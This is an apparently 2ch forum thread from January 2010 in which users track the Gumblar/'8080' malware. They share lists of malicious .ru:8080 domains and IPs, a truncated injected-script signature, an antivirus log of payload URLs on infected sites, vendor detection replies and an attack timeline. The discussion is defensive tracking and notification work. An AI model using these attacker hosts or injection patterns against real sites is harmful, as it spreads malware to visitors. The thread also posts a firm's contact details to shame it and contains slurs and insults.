http://mozilla.jp/press/releases/2010/01/21/
>>285 追加しますた
8080 系ブラックサイト
---------------
ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
(次に続く)
293 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 02:08:43
手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
全部IPが引けなくなってしまった
>>285 これも全部アドレスが引けない
>>286 これも引けなかった
>>274 これだけアドレス引けたけど、どしたらいい?
217.23.5.27
91.121.4.99
91.121.167.41
94.23.11.38
94.23.206.229
初回起動時も速くなったのかな
295 :
292 :2010/01/22(金) 02:09:20
>>292 のつづき
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
>>294 sqliteをアイドル時に自動で最適化するようになったから結構違うはず
>>296 CCleanerで小まめに最適化してる俺に隙はなかった
>>296 SQLite Optimizerお役ご免か
まあいいけど
特徴的な難読化アルゴリズムがかえって検出に役立ってたのに… ここで見え見えの平文に切り替えてくるとか、何という逆転の発想w 敵もさる者よのう
「下手に難読化しなくても馬鹿なジャップだったら気づかないだろwwwww」とか思われてそうだし実際そうだから困る
難読化されてもされてなくても気づかない奴は気づかないからなぁ
鯖ハックして裏proxy網構築終わったからじゃね もうru:8080はお役ご免, これからは今まで改ざんされた鯖が裏proxyになる。 これで正規のリダイレクトか不正のそれか区別出来なくなった
>>302 お前が馬鹿なのがよく分かる書き込みだな
ガンブラーマシン作った どのサイトも安心してのぞける
リファラに陥落サイトのURLを突っk(ry
/*Exception*/
firefoxのVista以降の保護モード対応まだ? 保護モードに対応するまでIE使い続ける
<script>/*Exception*/ document.write('<script src='+'h#(&t(t ふぅ・・・
東京財団 週末学校 hxxp://tkfd-shumatsu-gakko●jp/cat15/ コードだけ撤去して「告知せず」かよ Googleのキャッシュ(アクセス注意) tp://74.125.153.132/search?q=cache:AktNBszrpnwJ:tkfd-shumatsu-gakko.jp/cat15/+tkfd-shumatsu-gakko.jp/cat15&cd=1&hl=ja&ct=clnk&gl=jp >このページは 2010年1月10日 16:55:12 GMT に取得されたものです。 ソースに/*LGPL*/が刻印されてるしw
まあまあ よく腐敗した組織だことw
これだけあちこちで感染してるんだから 逆にその流れに紛れてきっちり謝罪したほうが 好感度↑なのにねぇ。あほすぐる
ttp://www.tkfd.or ●jp/news/detail.php?id=17
当財団ウェブサイトに関するお詫び
TOP 公募・お知らせ 当財団ウェブサイトに関するお詫び
更新日:2010/01/07
東京財団の日本語ウェブサイトにおいて、第3者による改ざんが確認され、
ウィルス感染の可能性があるページを一定時間公開していたことが判明いたしました。
ここにお知らせいたしますとともに、対象時間に当ホームページを閲覧された皆様に
ご迷惑をおかけしましたことをお詫び申しあげます。
サイト全体を確認した結果、1月6日11時54分現在、修正を完了しております。
■対象サイト
東京財団日本語ホームページ(
http://www.tkfd.or.jp/内のページ )
■対象時間
2010年1月5日19時30分ごろ〜1月6日正午ごろ
■内 容
第三者による改ざんにより、当財団ホームページの一部に不正な記述がなされ、
ウイルス感染の可能性があります。感染したパソコンでは、意図しないサイトへ
誘導されてしまう可能性があります。
1/6に修正完了?
「ホリプロ」サイト、ガンブラー感染公表せず
http://www.yomiuri.co.jp/net/security/s-news/20100122-OYT8T00417.htm 東京都は21日、東京芸術劇場(豊島区)の演目を案内する専用サイト
「東京芸術劇場チケットサービス」が改ざんされ、新型コンピューターウイルス「ガンブラー」に感染していたと発表した。
現時点で個人情報流出などの被害報告はないという。サイト運営業者は今月9日に感染に気付いていたが公表せず
サイトが閉鎖されたのは19日になってからだった。先月17日以降に閲覧した人は感染の恐れがあるといい
この間のアクセス件数は2万3181件。
発表によると、同劇場では今月19日、サイト利用者から「ウイルスに感染しているのではないか」との連絡を受け、サイトを閉鎖。
しかし、サイト運営を委託されている芸能事務所・ホリプロ(東京・目黒区)はこれより前の今月9日に、別の利用者からの指摘で感染に気付いていたが
公表していなかったという。
同社は「担当者が重大性を認識しておらず、改ざん場所を復旧させただけで、公表しなかった。深く反省している」としている。
>>322 固定コンテンツしか使ってないサイトもたくさんやられてるじゃん
だから普通にftpアカウント盗まれてるでしょ?
>>323 で、今はホリプロのトップにお詫びの告知があるのか?
とてもとても見に行く気にはなれないけど
326 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 11:53:41
>>322 トレンドマイクロ サポートサービス本部 セキュリティエンハンスメントサポートグループ Threat Monitoring Center 課長の飯田朝洋氏
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
> ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです
トレンドマイクロ終了のお知らせでした
328 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 12:03:48
>>317 > コードだけ撤去して「告知せず」かよ
そんなのいいほうだよ
ttp://www.ikumo-web.org/news/nanoimpact-trojan/ > 2010年1月2日(土)現在、ナノインパクトのHPにアクセスすると、ウイルス対策
> ソフトがトロイの木馬を検知します。以下参考ページの内容と同様の事象と推測
> しています。
↓
> 2010年1月6日(水)、HPの管理者より問題が解決したの連絡を受けました。当サ
> イト管理者が確認したところ、連絡を受けた通り解決してました。
>
> 原因は不正改ざんではなく、過去に作成したファイルがサーバに残っており、そ
> れが原因とのことです。また、ウイルス感染もないとのことです。
ナノインパクトのHPとやら
ttp://www ●nanoimpact●jp/
> 10.01.06 1月2日に一部のHPにてナノインパクトHPが不正改ざん、ウイルス感染の
> 可能性という 掲示が出ておりました。弊社で調査したところ原因は不正改ざんや
> ウイルス感染ではなく、過去に作成したファイルがサーバに残っていたために一部
> のウイルスセキュリティソフトにてウイルスと認識されておりました。該当ファイ
> ルを削除し、問題のないことを確認致しましたことをご報告致します。
ほほ〜ぅ>>監視モードスタート>>
2010/01/08 9:51 改ざん(/*LGPL*/埋め込み)
2010/01/12 22:42 修復
未だ告知なし
俺の中ではこいつらが最凶
主流はSQLインジェクション、HPコンテンツ管理会社に責任なんか無いんだからねっ!
企業は正直に話したほうがいいのにw
GENOウイルスに対向して8080系はNANOウイルス
332 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 12:33:51
不道徳企業はリスト化するのがベスト
いいねえ ことあるごとに、こっそり(のつもりで)修復して知らん振りの企業名を挙げてやればいい
pana持ってる奴いる?検疫になんもファイル追加出来ないんだが
>>328 これはw
もしかして専スレde大炎上を望んでる?
燃やすぞー
>>328 うわあ
なんで傷口を広げるようなことを言うかねえ
すみませんご迷惑をおかけしましただけで、あとは黙っておけばいいのにねー
>>340 告知せず&意味不な事を書いて逃げるサイトは
消えて無くなった方が良いから。
隠す・逃げるサイトは徹底的に叩かれるべき
株式会社ユノインターナショナル
〒541-0046 大阪市中央区平野町2-3-7 アーバンエース北浜ビル12F
〒541-0041 大阪市中央区北浜1-3-14 西川三井ビルディング10F
電話 06-6231-0550
FAX 06-6231-1077
[email protected]
馬鹿だなお前ら。黙りなんて他でもいくらでもいるだろうに
社員レス
いくらでもいるだろうけど 見つけ次第許さないよw
素人向けに説明しないと炎上どころか書き込みもなくなるぞ
ν速なんて馬鹿しかいないんだからもっとわかりやすいネタじゃないと伸びないよ
>>1 なんて読まないし
>>350 乙と言いたいところだが・・・
説明不足だろJK・・・
やられたサイトなんて山のようにあるから、 マイナーサイトなんてやられてましたすいませんって謝っておくか完全無視きめこんどけば 話題にもならないのに わざわざ嘘ついて話題になるとか狙ってんのか?
悪名でも有名ってことかねえ〜w 経営陣が社員に恨まれてるとかかも?
たけし「働けよ」
自分も働いてるから許せないのに 働くことに対するポリシーの無い人は,自分さえ感染しなきゃおkなの?
ニートは自己の正当化しかしない
セキュ板ってニート少なそうな印象なんだけど 煽り文句は板別に設定すべきだと思うよ
363 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 15:27:53
セキュ板は書き込みの過半数が自宅警備員w
>>347 悔しかったら告知&お詫びしろ
話 は そ れ か ら だ
×自宅警備 ○ホームセキュリティ
γ⌒ヽ < `∀´> < つ=つ ノ ノ三) ∠、 m)=m)
マジか ホームセキュリティの人が検体送付とか電凸とかマメにしてくれてんのか
ネットの平和守られてんじゃん 馬鹿に出来ねえ
369 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 16:18:29
なんでlが全角になっちゃったんだろう… 『/*GNU GPL*/』→『/*LGPL*/』→『/*handle exception*/』 となってってるそうで。 難読化も無く判断しづらい物になってるらしい。悪質だね。
ごめんよ、ageた上に誤爆。
1日10アクセスもない俺の個人サイトさえ改ざんの告知したというのに告知しない企業ときたら 利用者はグーグルロボット2名でした
>>235 凸完了
HPを作っているのはHP製作会社ではなく
友人にお願いをして作って貰ったとか。。
>>371 サイト運営者の鏡だよ
アク解に残ってない閲覧者もいるかもしれないし
>>373 シネ基地外。何してやったりな顔してんだよw
>>377 あたま大丈夫か?
何に毒されたらそうなっちゃうの?
379 :
名無しさん@お腹いっぱい。 :2010/01/22(金) 17:26:10
>>376 アクセス解析に残ってない閲覧者って何だよ?
>>379 アク解に残らないようにするブラウザ用アドオンとか出回ってるんだけど知らない?
hostsに書き込んで拒否してる人も結構いるし
Ninjaの手裏剣クルクルとかうざいからな
apacheのログファイル見ろksg
無料スペースだろどうせ
ぶつぶつ言っても何もかわらないよ
つtwitter
凸されてファビョってるのはされた本人かね? そうだよねシス管として致命的だもんね 恥ずかしいよね
疑問 何故海外からのアクセスを許しているのか?(FTP鯖) せめて国内オンリーにしろよ・・・
netはじいたらyahooから更新できなくなるとか いろんなプロバイダを使ってるから一律拒否出来ない 海外禁止ってやるのはいいが拒否するドメイン全て登録させるとか出来ない それにもし許可リストを使うにしてもリストの管理はサーバ屋に頼めば基本有料になるはず
>>379 本体じゃなくGoogleキャッシュで見てるとか?
>>389 GeoIPとiptable等のパケットフィルタでおkだろ
>>391 アク解もキャッシュされてたらそれでも足跡残るよ
野暮な質問だけど こういうウイルス作ったり 不正アクセスでサイト改ざんしたら捕まるの? その主犯を捕まえることはできないの? 教えてエロイ人
日本でやったら日本の法律に引っかかる
野暮ってこんなときに使うっけ
PCを物理的に破壊したら器物破損もプラスされるんだっけ
>>285 ,292
質問。この辺にあるアドレスが含まれてるjavaコードは
genoウイルスの可能性があるってことでいいんですか?
genoって言われるとなあ
operaのブロックコンテンツで*.ru.*入れときゃ大丈夫かな
.ru じゃなくなったとたんにあぼ〜ん 気休めだな
>>401 通ってるサイトに上にあるURLが含まれた変なコードがくっ付いているんです
genoかと思って調べてたらここにたどり着きましたもので。
ウイルスじゃなくて、あまり問題ない物ならいいんですけど
メールで一言伝えようか迷ってたもんで
GENOじゃないきゃいいのか?w 見てやるからさらせよそのサイト
>見てやるからさらせよそのサイト 404が直リンする予感
>>284 nikkansportsって・・・
ソフト更新はしてるけどやべぇな
>>404 知り合いなら伝えてやればいいけど
そうじゃないなら本人じゃなく管理会社に伝えた方が正確かもしれん
>>411 それ、まさかそのスレッドがやられているってこと?
正直に話してくれ
>正直に話してくれ ワロタ
マグペケか
一体NODに何があったというのだ 化け物か
なんかのランキングだとNOD最強らしいじゃん、こないだまでゴミじゃなかった?
>>419 あれってあてにならないんじゃなかった?
SRIだろ? あれはネタにもならない
まさか中の人が派生種作ってるんじゃ
>>411 cobalttrueblue.ru:8080
コバルト8080
>>350 見てきた
> 23 名前: モンドリ(東京都)[] 投稿日:2010/01/22(金) 16:36:14.22 ID:AdO+SHBS ?2BP(778)
> キャッシュ消せば大丈夫って
> ウイルスに詳しいGENOの店の人がいってただろ!
このレス見れただけで満足だわ 懐かしいなw色々と半年前のこと思い出したわww
>>398 告知もせず無視決め込んだパルコールは勝ちだな
白痴ランド,昨日直ってた後は告知してなかったな このままにする気かな
>>411 ,
>>416 かすぺ
> Hello,
>
>
> index.html, scooooop.html - Trojan-Downloader.JS.Pegel.c
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Regards, Vorobiov Vitaly
> Virus Analyst
熊親父
やっべかすがに見えたwwwwww なんでかすがが出てくるんだろう
AVGの常駐ガードは優秀だな。
過去に3回ほど何かしらに連絡したけど、改竄されてましたって告知したのは無かったな。
http://green ●ribbon●to/~fakestar/
/*Exception*/ さんは新型か
genuinehollywood.ruを追加
401 えらぁ tkfd-shumatsu-gakko●jp
view-source: で見ても大丈夫だよね?
これって「*.com*.com*」で阻止できるんじゃね?
>>438 chromeだとview-source:で危険なサイトでブロックされると、
表示許可したときにソースではなく普通に表示されたような気がする
ブロックされなければ平気
>>437 一応そこの管理人にめるしたけど、スパム扱いされるの必至なので
ドメインから逝こうとしてライブドアかと思ったらAAA!CAFEなのね。。。
>>440 あんがと。
>>437 を見てみたけど ESETでブロックされた。
怖いからもう止めますw
>>411 ,
>>416 Avira
> Filename Result
> index.html MALWARE
> The file 'index.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.33127.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
>
>
> Filename Result
> scooooop.html MALWARE
> The file 'scooooop.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.505009.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
>>411 ,
>>416 Fortinet
> Dear Customer,
>
> We have analyzed the sample you provided and developed the
> pattern to catch it. We will add detection for this sample
> in the next regular update.
>
> The sample you submitted will be detected as "JS/MalRedir.B!tr.dldr".
>
> Regards,
> --
> Alexandre Aumoine
> Anti-Virus Analyst, Threat Response Team - EMEA
>
> To submit a suspicious file to Fortinet:
>
http://www.fortinet.com/FortiGuardCenter/virus_scanner.html
http://www ●adkako7●com/ikesei/を開いたらカスペがトロイに反応しました。
カスペのログを見るとこのようになっています。
許可しました
http://icq-com ●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar
OK
http://icq-com ●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/META-INF/MANIFEST●MF
OK
http://icq-com ●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/PayloadX●class
OK
http://icq-com ●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/AppletX●class
検出&禁止しました
http://icq-com ●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/LoaderX●class
許可しました
http://icq-com ●bangbros1●com●adsrevenue-net●genuinecolors●ru:8080/pics/myf/y/AppletX●class
再現しようとしてもカスペのログに何も表示されません。
OKしたものや最後の許可で私が感染済なので無反応なのでしょうか?
■Gumblar.cn(Gumblar、Gumblar.x)
現在冬眠中。のはずだが・・
ttp://www.google.com/safebrowsing/diagnostic?site=Gumblar.cn&hl=ja センセイは毎日捕捉中w
■Gumblar.8080系(と呼ぶことになったらしい)
/*LGPL*/:ちょっと迷走した後/*Exception*/に進化
※世界各地で絶賛バージョンアップ中。
検索ワード:"<script>/*Exception*/ document.write("+"<script src"
/*CODE1*/:弾かれまくるので追跡を断念
※情報求ム
■何故かスルーされる亜種っぽいやつ
<script>function〜:8080系の亜種?
少しずつ減ってきたっぽい。
>>448 一度アクセスしたIPははじかれるらしいので試すならIP変えないとだめだね
でもそういうデザインの感染サイトすごくいっぱいあるよね
>>441 直しました
IETabが3.6に対応したらまた書き直す
>>452 ワーオ、そこ京都(大阪でも?)ではそこそこ有名よ〜
単館上映映画見る人がかなりチェックしてると思う。
454 :
名無しさん@お腹いっぱい。 :2010/01/23(土) 11:06:41
串通せば感染する。 ただ、Gumblarに感染後、forhomessale.ru に感染した旨を通知する通信が発生するらしいんだが Gumblar感染後、forhomessale.ru の名前解決に失敗してるっぽい、、、 それでもFTPアカウントは窃取されんのかな?
>>452 Last-Modified: Fri, 22 Jan 2010 11:53:46 GMT
>>442 似たようなサイト作ってるんで,そのメールアドレスから送信しておいたよ。
キャッシュにはAvast5反応してくれるんだけど,トップページのにはまだ
反応してくれない。次の更新で対応してくれてればいいけど。
>>449 > ■Gumblar.cn(Gumblar、Gumblar.x)
Gumblar.xはGumblar(GENO)とは別にして欲しい
対応ってのは「改竄部分を消して元に戻す」って意味だろうな 鍵を代えるだの穴を塞ぐだのではなく
>>460 期待は出来ないと考えた方がいいかもです
HPを作っている方は専門会社ではなく
ボランティアスタッフが作っているとか
映画チケットを貰ってるそうなので
無料奉仕ではなさそうですが
>>448 でじろく
>>452 whois上流のとこ (´-`).。oO(届いてくれればいいなぁ…)
それぞれめる
>>461 お疲れ様です。
まだ直ってなかったので上流にめるしました。
見逃してたm(_ _)m
>>456 乙です。
助かります。
www●minami-aoyama●info/ genuinehollywood●ru:8080 札幌市公園緑化協会直ったんじゃなかったっけ? リンク元はなさそうだから残骸っぽいけど、日付が www●sapporo-park●or●jp/blog_odori/wp-includes/js/tinymce/utils/mctabs●js Last-Modified: Fri, 22 Jan 2010 01:49:02 GMT www●sapporo-park●or●jp/blog_nishioka/wp-includes/js/scriptaculous/dragdrop●js Last-Modified: Fri, 22 Jan 2010 01:20:42 GMT genuinehollywood●ru:8080 ちなみに、index●php はどうやってデコードしてるんですか?
Vista/7でIEの保護モード使ってる奴すくなすぎだろ 保護モード使えばブラウザやプラグインのバグで無警告でやられるのなんて無いだろ 警告メッセージがでてOKだせばやられるとかだし
>>465 みんな使ってると思うが
統計でも取ったのか?
また火狐野朗がなんかいっちゃってるのか LINDOWS?つかえって
lindowsってザンドロスに吸収されたんだっけ
Windows以外を使うってのも、ありと言えばありだろう。
今頃になってこのスレ読んで、なんか甘く見ていた感 FxとIE8併用だけどIEはしばらく開かんとこう・・ AVも気休め程度のAVGじゃ不安だ。不安すぐる。
なんか面倒だからブラウザから8080への通信をブロックすることにした。 ポート変われば意味ないだろうけど。
対策してればFxもIEも同じだよ
>>475 【トレンドマイクロ】
\(^o^)/オワタ
ガハハ
またアンチウイルス戦争始めるのか
ちょいオモロイ奴があったんだけど
http://ameblo.jp/suzu-gyosei/entry-10439409700.html > 2010-01-21 15:50:20
> 当事務所のホームページ「カーポスト」が
> 年明けのいつごろかにgumplerにより改ざんされておりました。
> サーバー会社と連携して、現在感染しているファイルが
> ないことを確認致しました。
これって、/*GNU GPL*/が入ってるここのことだよな
http://www ●car-post●jp/
Last-Modified: Tue, 19 Jan 2010 03:52:37 GMT
とりあえずgoogleさんに聞いてみよう
ttp://74 ●125●153●132/search?q=cache:lbVrFVlo7lYJ:www.car-post.jp/&cd=1&hl=ja&ct=clnk&gl=jp
このページは 2010年1月13日 16:13:55 GMT に取得されたものです
/*LGPL*/が入ってたんだな……えっ
某日 /*LGPL*/ ハケーン
19日 (/*GNU GPL*/入り)バックアップから復旧しますた
21日 サーバー会社と連携して、現在感染しているファイルがないことを確認致しました(キリッ!)
って話なのか
詳しい奴教えてくれ
俺いまノーガードなんだけど、火狐の「RequestPolicy」ってアドオンだけで問題ないなw
>>448 のサイトも、ちゃんとアクセスをブロックしてるログでてる。
この手の、他サイトへアクセスしてウイルスに感染させるタイプにすごく有効じゃね?
482 :
448 :2010/01/24(日) 00:27:55
>>5 と
>>8 (11)の感染確認をして記述やファイルがなく、カスペのフルスキャンで何も出てこなければ感染はしていないと思っていいのでしょうか?
WinXPSP3でKaspersky Internet Security 2010を使っています。
>>482 亜種が生まれ続けているので感染していないと言い切れない
>>480 サーバー会社もろとも終わってるな
halfsite.ruか
>>482 心配な場合はOS入れなおしが精神的にも安心安全
>>480 RequestPolicyで確認したお!怪しいのブロックしてるお!ww
次はRequestPolicyか 火狐野朗が
491 :
448 :2010/01/24(日) 01:34:42
>>483 ,
>>487 少し不安は残りますが
>>6 の更新とアンチウイルスソフトのアップデートをまめにしつつしばらくこのままで行こうと思います。
>>464 上:さくら
下:そこだけじゃないことを確認/*Exception*/ blogがいくつか… 作業中
> index●php はどうやってデコードしてるんですか?
上のほうにあるスクリプトのこと?
メモ帳でガリガリ
あー、/wp-includes/js/かお。。。
ここは2ちゃんらしくプゲラウィルスと呼ぶべきかと。
パトラッシュ、僕はもう疲れたよ・・・ ベンダーに任せるよ・・・
>>480 これはもうどこに通報すればいいんだろ。。。
>>480 とりあえずwhoisからめる
大丈夫にゃんだろか。
ねるねるねるね
\ ■■ / \ ■■■ \∧∧∧∧∧∧∧∧∧∧∧∧∧∧/ \ ■■■■ < ━ ╋ ┓ ┃> \ ■■■■ /< ━┓ ╋ ┃ ┃ ┃> \ ■■☆■■ / < ┃ ┏╋━ ┃ ┃ > \ ■■■■■/ < ┃ ┗┛ ┗ ・> 彡| ━ ━ |ミ /∨∨∨∨∨∨∨∨∨∨∨∨∨\ 彡彡|─◎─◎─|ミミ ─────彡彡| ┌└ ┐ |ミミ─────────────── 彡彡| ─── |ミミミ 彡彡彡\\二/ /ミミミ テーレッテレー♪ 彡彡彡▲\__/▲ミミミ /彡彡▲■■■■■▲ミミ\ ねっておいしい / 彡彡 ■■■■■■■ミミ \ ねるねるね〜るね♪
> ガンブラー再燃を契機にセキュリティの基本を見直そう
>
http://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security 俺たちの誤解なんだってさ
> ■変更履歴
> 記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクション
> によるものだという誤解を招く表現があったため、これを修正しました。
> [2010/1/22 15:40]
記念にDiffておくよ
*****【旧】
ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLインジェクションによるものだと推測しています。
*****【改】
一般的に、Web改ざんの手口はWebアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のガンブラー攻撃によるWeb改ざんにも、SQLインジェクションが使われた可能性があると推測しています
*****
*****【旧】
まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです。
*****【改】
まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口にはSQLインジェクションが使われている可能性があるためです。
*****
*****【旧】
*****【改】
■変更履歴
記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクションによるものだという誤解を招く表現があったため、これを修正しました。
[2010/1/22 15:40]
*****
修正されてもまだ誤解されそうだな。 どう見てもSQLインジェクションと関連付けたがってるようにしか見えない。
念のため貼っとく > 大辞林 第二版 (三省堂) > > ごかい 【誤解】 > > (名)スル > > 事実や言葉などを誤って理解すること。思い違い。 > 「真意を―する」「―を招く」
>>475 トレンドマイクロ醜態をさらしたなw
だいたい固定コンテンツしかないようなサイトまで被害にあってる時点でSQLインジェクション説は微妙なのにね
>>502 セキュリティー企業なのにトレンドマイクロアホすぎるだろ
素人がやってんのか?
>>505 htmlのような静的なコンテンツしか置けないGeocitysでも起こってるから100%あり得ない
,,v‐v-/l_ (⌒) _「/ ̄ く / lYノノ/_ノl_ヽ)) <イ( l l )l> / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ <|)'|l、"(フノ|l < えっちのような性的なコンテンツはいけないと思います! ,(ヨリ<>o<>リ'] \______________ |ト‐!]-ム- i']l ヽ_ノv__l/ / . ノ[//‐─‐/_/、 ( /E|, (フlヨ \ ,-| El___lヨ / └-\`^^^^^^´/
例の上映団体RCS >一部のセキュリティソフトにおいて、 >当ホームページへのアクセス遮断や、 >感染警告の表示などが発生している様です。 >早急な対応を試みておりますが、 >じゅうぶんご注意ください。 改竄されてました,とは意地でも書かないのね
ちょっとここでずらずらっとタイムラインを自分的に整理だらだらと羅列してみました。 恥ずかしいので Hide :: まず、最初に事態が発生したのは 2009年3月ごろ lite〜.cnとかいう変なドメインから "drive by download"なる攻撃手法が発生しました。 当初、原因ははっきりせず、 やがて Adobe Flash/Readerの「最新版では塞がれている脆弱性」を つかった自動マルウェア埋め込みの手法であることが判明しました。 これは、当時としては「なにタワゴト言ってるんだ」というレベルの 「Webを見ただけで感染」という手法であり、あまりそれを信用してもらえず、 セキュリティ各社もあまり報道せず、事態は水面下で流れていきます。 そして、運命の 2009.04.05 PC通販ショップのGENOで感染が確認され、 一度は感染コードの除去が行われたにもかかわらず、 再感染というセンセーショナルな事態を引き起こします。 GENOが感染した際には gumblar.cnではなく、 zlkon.lv(94.247.2.195 as hs.2-195.zlkon.lv)でした。 このときには単純な難読化コードに jQuery.js への誘導コードが記述され、 さらにそこからドライブ・バイ・ダウンロード攻撃のためのリンクに飛ばされました。 GENOが事あるごとに叩かれるのは、 「コンピュータを売ってる店がそんな認識でいいのか?」という部分と 「キャッシュを消せば大丈夫」ってあたり(笑)だとおもいますけど、 同時期に感染した楽天系の2つの店はもっと対応が酷かったことは あまりしられておらず、 私的には 「GENOウィルス」という呼称は好きではアリマセン。
>>511 ここで重要なことは従来言われていた
「怪しいサイトにいかなければ大丈夫」という神話が
崩壊したことです。
普通一般のどこにでもあるサイトが
ある日突然、陥落して毒を吐き出すようになる
というのは想像すらしていなかった
攻撃ベクトルになりました。
その後、94.247.2.195は応答停止となり、
終焉したかにおもわれましたが、
わずかのブランクの後、
初代Gumblar(Gumblar/Martuz)として凱旋してきました。
このとき、初めて事態の深刻さがわかりました。
初期の zlkon の攻撃時に「インストール」されていたマルウェアは
潜伏中に感染ノードからありとあらゆる情報を盗み、
一番有効な撹拌手段として、
FTPアカウントを盗んでサイトを改ざんし、
さらに感染者を増やすというねずみ講的手法に転じたのです。
しかも、このねずみ講には、大きな違いがありました。
zlkon.lv時代になかった
「感染しない環境には普通のコードを返す」という
逆発想的rootkit手法を導入したのです。
更にはIP制限により、一度マルウェアをダウンロードした相手には
一定期間配布しないという「ケチ政策」も施行されました。
>>512 これにより、感染する可能性の低い環境には何も起きず、
脆弱性のある環境への「無差別ターゲット型」攻撃という
言語的にもにアリエナイ攻撃手法が確立しました。
この手法により脆弱性を放置していた環境にのみ爆発的に広まり、
かつ、普通にセキュリティ意識の高いユーザは何が起きているのかわからず、
セキュリティ会社は検体を取得できないという、
きわめて皮肉な結果が更なるパンデミックを引き起こしたのです。
しかも、この勤勉なマルウェア作者はほとんど毎日のように、
javascriptコード、マルウェア本体の更新を行い、
セキュ会社とのイタチゴッコなせめぎ合いの主導権を握り続けました。
このとき、悔やまれることは zlkon.lvのテイクダウンの際に、
(ITパスポートのCMをうつ金があるなら)
きちんとした対応策を
IPAあたりが音頭を取って報道等で告知していれば、
こんな事態になることはなかったのではないか?と思われることです。
しかし、まだこのときは救いがありました。
gumblar.cnもmartuz.cnも、単独のIPであり、
極端なことを言えばたった3つのIPを塞いでしまえば、
この攻撃は無効化されたのです。
そして、このことをいまだに引きずって
「危険なIP/TLDを塞げば大丈夫」という
幻想を生む皮肉な結果になりました。
>>513 一方、攻撃手法として確立してしまった
ドライブ・バイ・ダウンロードは、
ますます嫌な進化を続け、
8080ポートへのリバースプロキシを悪用した攻撃が
水面下で進行していました。
この攻撃は、細かいスパンで切り替わる
5基のラウンドロビンを使った大量のドメイン投入で、
名称がつけられないまま 8080(仮)として、
延々とラウンドロビンを差し替えながら
感染ノードを増やしていました。
やがて、この 8080系も姿を消したかに見えた矢先の
2009年11月、
ScanSafeとKasperskyが突然アラートを発し、
「Gumblar復活」の烽火を上げたのです。
この新しいGumblar(Gumblar.X)は、
以前の gumblarよりも更に洗練された攻撃で、
その恐ろしく緻密に計算された陥落サイト群のヒエラルキー構成により、
幾つものBOTが、複数の役目を絡み合いながら機能する、
超並列Botサーバとなっていました。
しかし、この攻撃に使用されていた脆弱性は、
既に塞がれていたものばかりで、
これまで散々脅されていたユーザは
きちんと Adobe系の穴を塞いでいたため、
それほど深刻な事態にはなりませんでした。
>>514 ところが、その背後で 8080系が古くい癖に極めて有効な
Java JREの脆弱性を取り入れ、
一気に感染ノードを広げにかかりました。
これは、日本において
メーカ販売のPCに「プリインストール」されており、
かつ自動更新の手続きがとられていないものが多いため、
一気に日本で拡散する原因となりました。
また、マルウェア誘導コードに有名な日本のドメインが
サブドメイン名やフォルダ名に羅列され、
ホワイトリストと単純なORチェックを行っている
IDSではスルーされてしまうという
悲惨な状況も確認されています。
しかも悪いことに
12月初旬に Adobe Readerの脆弱性が公表、
PoCが公開されたにもかかわらず
あー長かった。
というわけで、
もしウチ的に "Gumblar"って何?と応えるとするなら
「いやなもの」
ということでどうでしょう(殴)
UnderForge of Lack ≫ Blog Archive ≫ 2010.01.23 土曜日
http://www3.atword.jp/gnome/2010/01/23/jan-23-2010-sat/
無理に小難しくひけらかし系文章書かなくてもいいから
ふかいい話だな
他人に何かを伝えるつもりが微塵もない、 単なるこれ見よがしな知識披露目的のオナニー記事だな。
ヲタクなんてそんなもんだ
>>520 ブログ主さん乙
とでも返されればご満足ですか?
結局このウィルスの目的は、Web改ざんがしたかったの? サイトの機密情報を盗みたかったの?
botnetの構築
読みにくいけど情報は正しいよね。 これを例のSQLインジェクション野郎に読ませるべき
並列処理させるSETIみたいなもんか
今思ったんだけどトレンドの人はconfickerと間違ったのでは。
529 :
名無しさん@お腹いっぱい。 :2010/01/24(日) 10:59:36
トレンドマイクロはバカでも課長になれます(キリッ
この課長は上がってきた報告書をこねくりまわして発表するのが仕事? そもそも解析結果を理解できてるとは思えないんですけど だめじゃん
>>502 いっそのこと「最初からSQL云々なんて書いてない!ガンブラにやられて改ざんされたっ、
